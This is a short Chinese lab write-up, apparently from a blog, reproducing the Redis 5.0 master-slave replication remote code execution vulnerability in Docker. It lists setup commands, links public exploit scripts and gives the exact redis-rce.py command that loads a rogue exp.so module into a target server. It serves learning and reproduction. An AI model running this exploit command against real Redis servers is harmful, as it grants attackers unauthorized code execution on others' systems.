##0x00 前言 这个Redis漏洞出来好久了,一直没时间复现。 最近在学习docker 就复现了这个漏洞。 docker大法好哇 真的好! docker大法秒哇 真的秒!html
##0x01 环境准备 server docker start //启动docker服务 docker search redis5.0 //redis5.0查找镜像 docker pull damonevking/redis5.0 //拉取镜像 
python
##0x02 启动redis服务 docker run -p 6379:6379 -d damonevking/redis5.0:latest redis-server git
##0x03 exp准备 git clone https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本 注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下, 而后执行以下命令: python3 redis-rce.py -r 192.168.115.43(目标ip) -L 192.168.115.43(源ip) -f exp.so
github
参考连接: https://mp.weixin.qq.com/s/3ReNSFoQA1V01_APTMnnyA https://github.com/Ridter/redis-rce https://github.com/n0b0dyCN/redis-rogue-server https://www.cnblogs.com/mrhonest/p/11162735.htmlredis